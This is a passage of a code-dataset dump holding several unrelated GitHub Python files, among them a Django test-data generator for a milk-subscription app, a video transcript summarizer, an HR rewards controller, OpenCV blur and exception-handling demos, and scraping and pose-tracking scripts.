jm.Share.objects.create(**share_all_fields)\r\n subprod_fields = {\"name\": \"Milch\"}\r\n subproduct = st.SubscriptionProduct.objects.create(**subprod_fields)\r\n subsize1_fields = {\r\n \"name\": \"4 Liter\",\r\n \"long_name\": \"4 Liter Abo\",\r\n \"units\": 4,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"4 Liter Abo enthält Produkte die 4 Liter Milch entsprechen.\",\r\n }\r\n subsize3_fields = {\r\n \"name\": \"8 Liter\",\r\n \"long_name\": \"8 Liter Abo\",\r\n \"units\": 8,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"8 Liter Abo enthält Produkte die 8 Liter Milch entsprechen.\",\r\n }\r\n subsize4_fields = {\r\n \"name\": \"2 Liter\",\r\n \"long_name\": \"2 Liter Abo\",\r\n \"units\": 2,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"2 Liter Abo enthält Produkte die 2 Liter Milch entsprechen.\",\r\n }\r\n subsize1 = st.SubscriptionSize.objects.create(**subsize1_fields)\r\n subsize3 = st.SubscriptionSize.objects.create(**subsize3_fields)\r\n subsize4 = st.SubscriptionSize.objects.create(**subsize4_fields)\r\n subtrype1_fields = {\r\n \"name\": \"4 Liter\",\r\n \"long_name\": \"4 Liter Abo\",\r\n \"size\": subsize1,\r\n \"shares\": 1,\r\n \"visible\": True,\r\n \"required_assignments\": 2,\r\n \"price\": 650,\r\n \"description\": \"4 Liter Abo.\",\r\n }\r\n subtrype3_fields = {\r\n \"name\": \"8 Liter\",\r\n \"long_name\": \"8 Liter\",\r\n \"size\": subsize3,\r\n \"shares\": 2,\r\n \"visible\": True,\r\n \"required_assignments\": 4,\r\n \"price\": 1200,\r\n \"description\": \"8 Liter Abo.\",\r\n }\r\n subtrype4_fields = {\r\n \"name\": \"2 Liter\",\r\n \"long_name\": \"2 Liter\",\r\n \"size\": subsize4,\r\n \"shares\": 0,\r\n \"visible\": True,\r\n \"required_assignments\": 1,\r\n \"price\": 300,\r\n \"description\": \"2 Liter Abo.\",\r\n }\r\n subtype1 = st.SubscriptionType.objects.create(**subtrype1_fields)\r\n subtype3 = st.SubscriptionType.objects.create(**subtrype3_fields)\r\n st.SubscriptionType.objects.create(**subtrype4_fields)\r\n depot1_fields = {\r\n \"code\": \"D1\",\r\n \"name\": \"Toblerplatz\",\r\n \"weekday\": 2,\r\n \"latitude\": \"47.379308\",\r\n \"longitude\": \"8.559405\",\r\n \"addr_street\": \"Toblerstrasse 73\",\r\n \"addr_zipcode\": \"8044\",\r\n \"addr_location\": \"Zürich\",\r\n \"description\": \"Hinter dem Migros\",\r\n \"contact\": member_2,\r\n }\r\n depot2_fields = {\r\n \"code\": \"D2\",\r\n \"name\": \"Siemens\",\r\n \"weekday\": 4,\r\n \"latitude\": \"47.379173\",\r\n \"longitude\": \"8.495392\",\r\n \"addr_street\": \"Albisriederstrasse 207\",\r\n \"addr_zipcode\": \"8047\",\r\n \"addr_location\": \"Zürich\",\r\n \"description\": \"Hinter dem Restaurant Cube\",\r\n \"contact\": member_1,\r\n }\r\n depot1 = Depot.objects.create(**depot1_fields)\r\n depot2 = Depot.objects.create(**depot2_fields)\r\n\r\n subscription_1 = ja_mgmt.create_subscription(\"2018-01-01\", depot1, {subtype1: 1}, member_1)\r\n subscription_2 = ja_mgmt.create_subscription(\"2018-01-01\", depot2, {subtype3: 1}, member_2)\r\n\r\n area1_fields = {\r\n \"name\": \"Abpacken\",\r\n \"description\": \"Produkte abpacken\",\r\n \"core\": False,\r\n \"hidden\": False,\r\n \"coordinator\": member_1,\r\n \"show_coordinator_phonenumber\": False,\r\n }\r\n area2_fields = {\r\n \"name\": \"Ausfahren\",\r\n \"description\": \"Produkte ausfahren\",\r\n \"core\": False,\r\n \"hidden\": False,\r\n \"coordinator\": member_2,\r\n 
\"show_coordinator_phonenumber\": False,\r\n }\r\n area_1 = ActivityArea.objects.create(**area1_fields)\r\n area_1.members.set([member_2])\r\n area_1.save()\r\n area_2 = ActivityArea.objects.create(**area2_fields)\r\n area_2.members.set([member_1])\r\n area_2.save()\r\n type1_fields = {\r\n \"name\": \"Abpacken\",\r\n \"displayed_name\": \"\",\r\n \"description\": \"the real deal\",\r\n \"activityarea\": area_1,\r\n \"duration\": 2,\r\n \"location\": \"auf dem Hof\",\r\n }\r\n type2_fields = {\r\n \"name\": \"Ausfahren\",\r\n \"displayed_name\": \"\",\r\n \"description\": \"the real deal\",\r\n \"activityarea\": area_2,\r\n \"duration\": 2,\r\n \"location\": \"auf dem Hof\",\r\n }\r\n type_1 = JobType.objects.create(**type1_fields)\r\n type_2 = JobType.objects.create(**type2_fields)\r\n job1_all_fields = {\r\n \"slots\": 10,\r\n \"time\": utils.timezone.now(),\r\n \"pinned\": False,\r\n \"reminder_sent\": False,\r\n \"canceled\": False,\r\n \"type\": type_1,\r\n }\r\n for x in range(0, 10):\r\n delta = utils.timezone.timedelta(days=7)\r\n job1_all_fields[\"time\"] += delta\r\n jm.RecuringJob.objects.create(**job1_all_fields) # warning\r\n\r\n job2_all_fields = {\r\n \"slots\": 10,\r\n \"time\": utils.timezone.now(),\r\n \"pinned\": False,\r\n \"reminder_sent\": False,\r\n \"canceled\": False,\r\n \"type\": type_2,\r\n }\r\n for x in range(0, 10):\r\n delta = utils.timezone.timedelta(days=7)\r\n job1_all_fields[\"time\"] += delta\r\n jm.RecuringJob.objects.create(**job2_all_fields) # warning\r\n\r\n # CS specific\r\n prod1_fields = {\r\n \"name\": \"Rohmilch\",\r\n \"units\": 1,\r\n \"unit_multiplier\": 1,\r\n \"unit_name\": \"Liter\",\r\n \"code\": \"A1\",\r\n }\r\n prod2_fields = {\r\n \"name\": \"Zusatzkäse\",\r\n \"units\": 2,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A2\"\r\n }\r\n prod3_fields = {\r\n \"name\": \"Quark\",\r\n \"units\": 1,\r\n \"unit_multiplier\": 350,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A3\"\r\n }\r\n prod4_fields = {\r\n \"name\": \"Fruchtjoghurt\",\r\n \"units\": 0.5,\r\n \"unit_multiplier\": 1000,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A4\"\r\n }\r\n prod5_fields = {\r\n \"name\": \"Naturejoghurt\",\r\n \"units\": 0.5,\r\n \"unit_multiplier\": 1000,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A5\"\r\n }\r\n prod6_fields = {\r\n \"name\": \"Wochenkäse klein\",\r\n \"units\": 2,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"user_editable\": False,\r\n \"code\": \"A6\"\r\n }\r\n prod7_fields = {\r\n \"name\": \"Wochenkäse gross\",\r\n \"units\": 4,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"user_editable\": False,\r\n \"code\": \"A7\"\r\n }\r\n csm.Product.objects.create(**prod1_fields)\r\n csm.Product.objects.create(**prod2_fields)\r\n csm.Product.objects.create(**prod3_fields)\r\n csm.Product.objects.create(**prod4_fields)\r\n csm.Product.objects.create(**prod5_fields)\r\n wochenkase_klein = csm.Product.objects.create(**prod6_fields)\r\n wochenkase_gross = csm.Product.objects.create(**prod7_fields)\r\n\r\n mandatory1_fields = {\r\n \"subscription_size\": subsize1,\r\n \"product\": wochenkase_klein,\r\n \"amount\": 1,\r\n }\r\n mandatory3_fields = {\r\n \"subscription_size\": subsize3,\r\n \"product\": wochenkase_gross,\r\n \"amount\": 1,\r\n }\r\n csm.SubscriptionSizeMandatoryProducts.objects.create(**mandatory1_fields)\r\n csm.SubscriptionSizeMandatoryProducts.objects.create(**mandatory3_fields)\r\n\r\n subcontent1_fields = {\"subscription\": subscription_1}\r\n 
subcontent2_fields = {\"subscription\": subscription_2}\r\n subcontent1 = csm.SubscriptionContent.objects.create(**subcontent1_fields)\r\n subcontent2 = csm.SubscriptionContent.objects.create(**subcontent2_fields)\r\n\r\n subcontentitem1_fields = {\r\n \"subscription_content\": subcontent1,\r\n \"product\": wochenkase_klein,\r\n \"amount\": 1,\r\n }\r\n subcontentitem2_fields = {\r\n \"subscription_content\": subcontent2,\r\n \"product\": wochenkase_gross,\r\n \"amount\": 1,\r\n }\r\n csm.SubscriptionContentItem.objects.create(**subcontentitem1_fields)\r\n csm.SubscriptionContentItem.objects.create(**subcontentitem2_fields)\r\n\r\n csm.SubscriptionContentFutureItem.objects.create(**subcontentitem1_fields)\r\n csm.SubscriptionContentFutureItem.objects.create(**subcontentitem2_fields)\r\n\r\n # add extra subscriptions (Zusatzabos)\r\n extra_sub_cat1 = ExtraSubscriptionCategory.objects.create(\r\n name=\"Spezialkäse\",\r\n description=\"Spezialkäse für Waghalsige Käseliebhaber\",\r\n sort_order=1,\r\n visible=True,\r\n )\r\n extra_sub_type1 = ExtraSubscriptionType.objects.create(\r\n name=\"Spezialkäse Einheitsgrösse\",\r\n size=\"Einheitsgrösse\",\r\n description=\"Einmal pro Monat Überraschunskäse\",\r\n sort_order=1,\r\n category_id=extra_sub_cat1.id,\r\n visible=True,\r\n )\r\n ExtraSubBillingPeriod.objects.create(\r\n start_day=1,\r\n start_month=1,\r\n end_day=31,\r\n end_month=12,\r\n type_id=extra_sub_type1.id,\r\n cancel_day=30,\r\n cancel_month=9,\r\n price=120,\r\n )\r\n jm.ExtraSubscription.objects.create(\r\n active=True,\r\n canceled=False,\r\n activation_date=utils.timezone.now(),\r\n main_subscription_id=subscription_1.id,\r\n type_id=extra_sub_type1.id,\r\n )\r\n","repo_name":"juntagrico/juntagrico-custom-sub","sub_path":"juntagrico_custom_sub/management/commands/cs_generate_testdata.py","file_name":"cs_generate_testdata.py","file_ext":"py","file_size_in_byte":12785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12718208613","text":"from dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nimport replicate\nimport openai\nimport pytube\nimport json\n\n# Skip this part if we have a transcript already\ntotal_text = \"\"\nif not os.path.exists(\"transcript.txt\"):\n\n path = input(\"Enter the URL of the video:\")\n yt = pytube.YouTube(path)\n\n\n # 16kbps is the maximum bitrate for the openai whisper model\n print(\"Downloading audio...\")\n audio = yt.streams.filter(only_audio=True).first()\n\n # download it into a temporary file\n audio.download(output_path=\".\", filename=\"audio.mp3\")\n\n print(\"Preparing transcript...\")\n output = replicate.run(\n \"carnifexer/whisperx:1e0315854645f245d04ff09f5442778e97b8588243c7fe40c644806bde297e04\",\n input={\"audio\": open(\"audio.mp3\", \"rb\")}\n )\n\n # Convert the output to a json dict \n array = json.loads(output)\n\n for segment in array:\n total_text += segment[\"text\"] + \" \"\n\n with open(\"transcript.txt\", \"w\") as f:\n f.write(total_text)\nelse:\n with open(\"transcript.txt\", \"r\") as f:\n total_text = f.read()\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ncontext = input(\"Enter the context of the video: \")\n\ndef summarizer(batch, size = True):\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You will summarize any text provided to you in bullet points\" + \"in 3 sentences or less.\" if size else \".\" + \"The context is: \" + context},\n {\"role\": \"user\", 
\"content\": batch}\n ]\n )\n return completion.choices[0].message.content\n\n# Actual summarization now\nwindow_size = 500\ntext_windows = [total_text[i:i+window_size] for i in range(0, len(total_text), window_size)]\n\nwindow_summaries = [summarizer(window_text) for window_text in text_windows]\nprint(window_summaries)\n\ncombined_summary = \" \".join(window_summaries)\n\nfinal_summary = summarizer(combined_summary, size=False)\n\nwith open(\"summary.txt\", \"w\") as f:\n f.write(final_summary)","repo_name":"idrizp/summarizer","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18238188076","text":"from PySide2.QtWidgets import QMainWindow,QWidget,QPushButton,QApplication,QPlainTextEdit\nfrom PySide2.QtGui import QFont\nimport sys\n\nclass MD_UI(QWidget):\n def __init__(self):\n super().__init__()\n self.resize(600,600)\n self.setWindowTitle(\"MD_get_data_tool\")\n msg_font=QFont(\"Arial\", 16, QFont.Black)\n self.msg = QPlainTextEdit(self)\n self.msg.setGeometry(10,10,580,520)\n self.msg.setFont(msg_font)\n\n\n Btn_font =QFont(\"Arial\", 20, QFont.Black)\n\n self.btn_start = QPushButton(self)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.setGeometry(10, 540, 180, 50)\n self.btn_start.setText(\"start\")\n self.btn_start.setFont(Btn_font)\n\n\n self.btn_clear = QPushButton(self)\n self.btn_clear.setObjectName(\"btn_clear\")\n self.btn_clear.setGeometry(210, 540, 180, 50)\n self.btn_clear.setText(\"clear\")\n self.btn_clear.setFont(Btn_font)\n\n\n self.btn_stop = QPushButton(self)\n self.btn_stop.setObjectName(\"btn_end\")\n self.btn_stop.setGeometry(410, 540, 180, 50)\n self.btn_stop.setText(\"stop\")\n self.btn_stop.setFont(Btn_font)\n\n\n def test(self):\n print(\"123456\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ui = MD_UI()\n ui.show()\n sys.exit(app.exec_())","repo_name":"Huan717/MachineInfomationBoard","sub_path":"Auto_UI/MDUI.py","file_name":"MDUI.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16766524110","text":"import sys\n\nsys.stdin = open('sample_input.txt', encoding='utf-8')\n\n\ndef dfs(v): # 재귀 이용\n visited[v] = True # 방문처리\n global result\n if v == g: # 현재노드(v)와 도착점이 같다면\n result = 1 # 결과값을 1로 변경 후 종료\n return result\n for next_v in graph[v]: # 현재 정점과 인접한 모든 정점\n if not visited[next_v]: # 아직 방문하지 않았다면\n dfs(next_v) # 인접 정점 방문\n\n\nfor t in range(1, int(input()) + 1):\n v, e = map(int,input().split()) # v: 노드의 수 e: 간선의 수\n graph = [[] for _ in range(v+1)] # graph 1부터 사용하므로 +1\n visited = [False] * (v+1) # 방문처리 리스트\n result = 0 # 결과의 기본값은 0\n for _ in range(e):\n v1, v2 = map(int,input().split())\n graph[v1].append(v2) # 방향 그래프\n s, g = map(int, input().split()) # s: 시작점 g: 도착점\n\n dfs(s) # 시작점부터 dfs시작\n print(f'#{t} {result}')","repo_name":"yooooonzzzzzang/Algorithm","sub_path":"04_Stack1_실습/07_4871_그래프경로/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11563803246","text":"import sys\nprint(sys.path) # for debugging\nimport numpy as np\nfrom deepposekit.models import load_model\nfrom deepposekit.io import DataGenerator, VideoReader, VideoWriter\nimport pandas as pd\nimport os\n\n# parse input arguments\nvideo, model_name, skeleton, output = 
sys.argv[1:]\n\n# for debugging\n# video = r'Z:\\loco\\obstacleData\\sessions\\200308_000\\run.mp4'\n# model_name = r'D:\\github\\locomotionAnalysis\\tracking\\deepposekit\\models\\model_run_StackedDenseNet.h5'\n# skeleton = r'D:\\github\\locomotionAnalysis\\tracking\\label\\training_sets\\skeleton_run.csv'\n# output = 'trackedFeatures_run.csv'\n\n# settings\nbatch_size = 16\nmax_frames = None # set to None unless debugging\n# max_frames = 100000 # set to None unless debugging\n\n# load model and video\nmodel = load_model(model_name)\nreader = VideoReader(video, batch_size=batch_size, gray=True, frame_size=model.input_shape)\n\n# predict\nmax_batches = max_frames//batch_size if max_frames else None\npredictions = model.predict(reader, verbose=1, steps=max_batches)\nreader.close()\n\n# save data\nfile_name = os.path.join(os.path.split(video)[0], output)\nfeatures = list(pd.read_csv(skeleton).name)\ncolumns = np.repeat(features, 3)\ndata = pd.DataFrame(columns=columns, index=np.arange(predictions.shape[0]))\ndata[:] = np.reshape(predictions, (predictions.shape[0], -1))\ndata.to_csv(file_name)","repo_name":"richard-warren/locomotionAnalysis","sub_path":"tracking/deepposekit/analyze_video.py","file_name":"analyze_video.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6680040933","text":"# Exceptions\n\n# Using LBYL (Look Before You Leap)\ndef divideFirstMethod(x, y):\n if (y != 0):\n return x / y\n else:\n return 0\n\n\n# Using EAFP (Easier to Ask Forgiveness than Permission):\ndef divideSecondMethod(x, y): \n try:\n return x / y\n except:\n return 0\n\n\n# Throw new Arithmetic Exception\ndef divideThirdMethod(x, y): \n try: \n return x / y\n except ZeroDivisionError as e:\n print(\"Did you try to divide by zero? {}\".format(e))\n\n\n# Not using exceptions\ndef divide(x, y):\n return x / y\n\n\n# Value\nx = 45\ny = 35\nz = 0\n\n\n# Exception handle\ntry:\n print(str(x) + \"/\" + str(y) + \"is:\")\n print(divideFirstMethod(x, y))\n print(divideSecondMethod(x, y))\n print(divideThirdMethod(x, y))\n print(divide(x, y))\n\n print(str(x) + \"/\" + str(z) + \"is:\")\n print(divideFirstMethod(x, z))\n print(divideSecondMethod(x, z))\n print(divideThirdMethod(x, z))\n print(divide(x, z))\n a = 0 / 0\nexcept ZeroDivisionError as e:\n print(e)\n print(\"Something went wrong, isn't it?\")\nfinally:\n print(\"Well done! You did it! Program still work, no error crash!\")\n\n\n# End of file\nprint()\ninput(\"Press Enter to continue...\")","repo_name":"FrogGreen/Python","sub_path":"018. 
Exceptions/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23425218361","text":"def search(cost,farm,goal):\r\n\ttime = 0.0\r\n\tspeed = 2.0\r\n\twhile time + goal / speed > time + goal / (speed + farm) + cost / speed:\r\n\t\ttime += cost / speed\r\n\t\tspeed += farm\r\n\treturn str(time + goal / speed)\r\n# def search(speed,cost,farm,goal,elapsed):\r\n# \tt = cost / speed + search(speed + farm,cost,farm,goal) + elapsed\r\n# \tif goal / speed > t:\r\n# \t\treturn t\r\n# \treturn t + goal\r\nwith open(\"B--small-attempt0.in\") as f:\r\n\twith open(\"result.txt\",\"w\") as out:\r\n\t\tn = int(f.readline().strip())\r\n\t\tfor i in range(n):\r\n\t\t\ts = f.readline().strip().split()\r\n\t\t\tout.write(\"Case #%d: %s\\n\" % (i + 1,str(search(float(s[0]),float(s[1]),float(s[2])))))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2548.py","file_name":"2548.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21282003843","text":"\"\"\"Helper classes describing the objects that are not a 'submittable' in the USI model\"\"\"\n\nfrom typing import List\n\n\nclass Component:\n \"\"\"The base component class, with the main purpose of adding a __repr__ function to all components\"\"\"\n\n def __repr__(self):\n \"\"\"Generate a printable string with class name and attributes\"\"\"\n return \"{}({})\".format(self.__class__.__name__,\n \", \".join([\"{}={!r}\".format(k, getattr(self, k)) for k in self.__dict__]))\n\n\nclass DataFile(Component):\n \"\"\"Attributes of a DataFile object\n :param name, string, file name\n :param checksum, string, checksum hash of the file\n :param checksum_method, string, the method used to calculate the checksum\n :param ftp_location, string, the FTP path to download the file\n :param read_type, string, the type of sequencing read, e.g. 
read1/read2/index1\n \"\"\"\n def __init__(self, **kwargs):\n self.name: str = kwargs.get(\"name\")\n self.checksum: str = kwargs.get(\"checksum\")\n self.checksum_method: str = kwargs.get(\"checksum_method\")\n self.ftp_location: str = kwargs.get(\"ftp_location\")\n self.read_type: str = kwargs.get(\"read_type\")\n\n\nclass Contact(Component):\n \"\"\"Attributes of a contact\n :param firstName, string, person first name\n :param lastName, string, person last name\n :param middleInitials, string, person middle initials\n :param email, string, email address\n :param affiliation, string, affiliated institute\n :param address, string, address of the institute\n :param phone, string, phone number\n :param roles, list of role terms\n :param fax, string, fax number\n :param orcidId, string, ORCID number\n \"\"\"\n def __init__(self, **kwargs):\n self.firstName: str = kwargs.get(\"firstName\")\n self.lastName: str = kwargs.get(\"lastName\")\n self.email: str = kwargs.get(\"email\")\n self.affiliation: str = kwargs.get(\"affiliation\")\n self.address: str = kwargs.get(\"address\")\n self.phone: str = kwargs.get(\"phone\")\n self.roles: List[str] = kwargs.get(\"roles\", [])\n self.middleInitials: str = kwargs.get(\"middleInitials\")\n self.fax: str = kwargs.get(\"fax\")\n self.orcidId: str = kwargs.get(\"orcidId\")\n\n\nclass Publication(Component):\n \"\"\"Attributes of a publication\n :param articleTitle, string, title of the publication\n :param authors, string, list of the author names\n :param pubmedId, string, PubMed ID of the publication\n :param doi, string, DOI of the publication\n :param publicationStatus, string, status term of the publication\n \"\"\"\n def __init__(self, **kwargs):\n self.articleTitle: str = kwargs.get(\"articleTitle\")\n self.authors: str = kwargs.get(\"authors\")\n self.pubmedId: str = kwargs.get(\"pubmedId\")\n self.doi: str = kwargs.get(\"doi\")\n self.publicationStatus: str = kwargs.get(\"publicationStatus\")\n\n\nclass Attribute(Component):\n \"\"\"Attributes of an attribute\n :param value, string, the attribute value, e.g. ontology label\n :param unit, Unit class object describing the unit of the value\n :param term_source, string, the source ontology of the term\n :param term_accession, string, the ontology ID of the term\n \"\"\"\n def __init__(self, **kwargs):\n self.value: str = kwargs.get(\"value\")\n self.unit: Unit = kwargs.get(\"unit\")\n self.term_source: str = kwargs.get(\"term_source\")\n self.term_accession: str = kwargs.get(\"term_accession\")\n\n\nclass Unit(Component):\n \"\"\"Attributes of a unit\n :param value, string, the unit term, e.g. hour\n :param unit_type, string, the type of unit, e.g. 
time unit\n :param term_source, string, the source ontology of the unit term\n :param term_accession, string, the ontology ID of the unit term\n \"\"\"\n def __init__(self, **kwargs):\n self.value: str = kwargs.get(\"value\")\n self.unit_type: str = kwargs.get(\"unit_type\")\n self.term_source: str = kwargs.get(\"term_source\")\n self.term_accession: str = kwargs.get(\"term_accession\")\n","repo_name":"ebi-gene-expression-group/common-datamodel","sub_path":"datamodel/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9038431114","text":"import os\nimport scrapy\nimport pandas as pd\nimport numpy as np\nfrom scrapy.loader import ItemLoader\nfrom equippo.items import EquippoItem\n\n\nclass ImagedownloaderSpider(scrapy.Spider):\n name = 'imagedownloader'\n print(\"Image Downloader Constructor Called !!!\")\n final_df = pd.read_excel('./scrapy_equippo.xlsx')\n all_files = os.listdir('/home/faizan/web_scraping/Cognitia/equippo/images')\n print(\"Done reading\")\n\n def start_requests(self):\n yield scrapy.Request(url='https://www.google.com/', callback=self.parse_main_page,\n dont_filter=True)\n\n def parse_main_page(self, response):\n total_length = len(self.final_df)\n all_columns = list(self.final_df.columns)\n for i in range(0, total_length):\n for k in range(1, 500):\n if 'Image Link ' + str(k) in all_columns:\n file_name = self.final_df['Image ' + str(k)].iloc[i]\n image_link = self.final_df['Image Link ' + str(k)].iloc[i]\n if file_name is not np.nan and file_name != '' and file_name not in self.all_files:\n loader = ItemLoader(item=EquippoItem())\n loader.add_value('image_urls', image_link)\n loader.add_value('file_name', file_name)\n yield loader.load_item()\n else:\n break\n","repo_name":"CognitiaAI/equippo-scraping","sub_path":"equippo/spiders/imagedownloader.py","file_name":"imagedownloader.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38040512848","text":"# different types of blurring\nimport cv2 as cv\n\nimg = cv.imread('cats.jpg')\ncv.imshow('normal', img)\n\n# Gaussian Blur\ngaus = cv.GaussianBlur(img, (7,7), 0)\ncv.imshow('gaussian', gaus)\n\n# Median Blur\nmedian = cv.medianBlur(img, 7)\ncv.imshow('median', median)\n\n# Bilateral blur\nbilat = cv.bilateralFilter(img, 9, 75, 75)\ncv.imshow('bilateral', bilat)\n\n\ncv.waitKey(0)","repo_name":"harry10-git/OpenCV-FCC","sub_path":"week3/blurs.py","file_name":"blurs.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34026922494","text":"\"\"\" This is the controller of the /rewards endpoint\n\nThe following functions are called from here: GET, POST.\n\"\"\"\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy import exists\nfrom databasesetup import create_session, Employee\nfrom models.employee_reward_api_model import EmployeeRewardApiModel\nfrom models.employee_response import EmployeeResponse\nimport requests\nimport logging\n\nlogging.basicConfig(filename='./log.txt', format='%(asctime)s :: %(name)s :: %(message)s')\nlogger = logging.getLogger(__name__)\n\n\ndef get():\n session = create_session()\n employee_collection = []\n info = \"Get Employees - Found the following employees - \"\n\n try:\n if not session.query(Employee).first():\n session.rollback()\n 
logger.warning(\"Get Employees - No employees exist in the system\")\n return {'error message': 'No employees exist in the system'}, 400\n\n all_employee_objects = session.query(Employee).all()\n\n for employee_object in all_employee_objects:\n employee = EmployeeRewardApiModel(employee_id=employee_object.id,\n name=employee_object.first_name + ' ' + employee_object.last_name,\n phones=employee_object.phones,\n orders=employee_object.orders)\n if employee_object.phones != 0 and employee_object.orders != 0:\n employee_collection.append(employee)\n\n except SQLAlchemyError:\n session.rollback()\n error_message = 'Error while retrieving all employee rewards'\n logger.warning(\"Employees.py Get - \" + error_message)\n return {'error_message': error_message}, 400\n\n # CLOSE\n session.close()\n logger.warning(info)\n if not employee_collection:\n logger.warning(\"Get Employees - No employees that can receive rewards are in the system\")\n return {'error message': 'No employees that can receive rewards are in the system'}, 400\n else:\n return EmployeeResponse(employee_collection).to_dict()\n\n\ndef post(employee):\n \"\"\"\n :param employee:\n :return:\n\n 1. check employee exists and grab it\n 2. add information to that employee\n 3. for each id in the array check for status from manufacturing\n 4. if low/medium increment\n 5. increment by 1.\n \"\"\"\n session = create_session()\n\n try:\n # Check if Employee exists\n if not session.query(exists().where(Employee.id == employee['employeeId'])).scalar():\n error_message = 'This employee does not exist in the system yet. ' \\\n 'Please use employees POST to add them as a new employee'\n logger.warning(\"rewards.py POST - \"\n \"The employee does not exist in the system\")\n return {'error_message': error_message}, 400\n\n employee_object = session.query(Employee).get(employee['employeeId'])\n if employee['replace']:\n return {'message': 'No rewards were counted for the employee {0}'.format(employee['employeeId'])}\n else:\n for serial_id in employee['serialIds']:\n try:\n phone_payload = requests.get(\"http://vm343b.se.rit.edu:5000/inventory/phones/{0}\".format(str(serial_id)))\n phone = phone_payload.json()\n except:\n session.rollback()\n error_message = 'Error while information from inventory with phone_serial_id: {0}'.format(str(serial_id))\n logger.warning(error_message)\n return {'error_message': error_message}, 400\n\n if phone[0]['fields']['modelId'] == 2 or phone[0]['fields']['modelId'] == 3:\n employee_object.phones += + 1\n employee_object.orders += 1\n\n except:\n session.rollback()\n error_message = 'Error while modifying employee base in rewards.py'\n logger.warning(\"rewards.py employees POST - \"\n \"Error while modifying the employee:\")\n return {'error_message': error_message}, 400\n\n return_message = \"Employee {0}'s count for phones has incremented now is {1} and now has {2} \" \\\n \"eligible orders\".format(employee['employeeId'], employee_object.phones, employee_object.orders)\n\n session.commit()\n session.close()\n return {'message': return_message}, 200\n","repo_name":"dfehrenbach/Swen343_Human_Resources","sub_path":"hr/controllers/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42842937572","text":"### Author: Jialin Cui \n### Refactored by Anh Nguyen\nimport os\nimport pandas as pd\nimport numpy as np \nfrom sklearn.mixture import GaussianMixture\nimport matplotlib.pyplot as 
plt\n\nclass Metrics():\n    def __init__(self, path_to_file):\n        self._ds = pd.read_csv(path_to_file)\n        # remove leading and trailing space in column names\n        self._ds.columns = self._ds.columns.str.strip()\n        self._pop_lang = set(['Python','JavaScript','Java','TypeScript','Go','C++','Ruby','PHP','C#','C'])\n        self._langs = ['AlanguageInfo','BlanguageInfo','ClanguageInfo','DlanguageInfo']\n\n    def get_datatable(self):\n        return self.dataframe\n\n    ## extract language numbers and popular language size\n    def _getLanguageNumberAndSize(self):\n        for index, row in self._ds.iterrows():\n            for item in self._langs:\n                col1 = item + 'count'\n                col2 = item + 'size'\n                ls = str(self._ds.at[index, item])\n                lcount = set()\n                lsize = 0\n                if ls != 'nan':\n                    ls = ls.split(';')\n                    for l in ls:\n                        lname, size = l.split(':')\n                        lname = lname.strip()\n                        size = int(size.strip())\n                        lcount.add(lname)\n                        if lname in self._pop_lang:\n                            lsize += size\n                    self._ds.at[index, col2] = lsize\n                self._ds.at[index, col1] = len(lcount)\n\n    def constructMetricsTable(self):\n        self._getLanguageNumberAndSize()\n        self.dataframe = self._ds[['GitHub']].copy(deep=True)\n        # # lifespan\n        self.dataframe['lifespan'] = self._ds['lifeSpan']\n\n        # RestrictedContributionsCount + CommitContributions = A\n        commits = ['RestrictedContributionsCount','CommitContributions'] \n        self.dataframe['A'] = self._ds[commits].sum(axis=1)\n\n        # commitComments + issueComments + gistComments + repositoryDiscussionComments + repositoryDiscussions = B\n        comments = ['commitComments','issueComments','gistComments','repositoryDiscussionComments','repositoryDiscussions']\n        self.dataframe['B'] = self._ds[comments].sum(axis=1)\n\n        # PullRequestReviewContributions + pullRequests = C\n        PR = ['PullRequestReviewContributions','pullRequests']\n        self.dataframe['C'] = 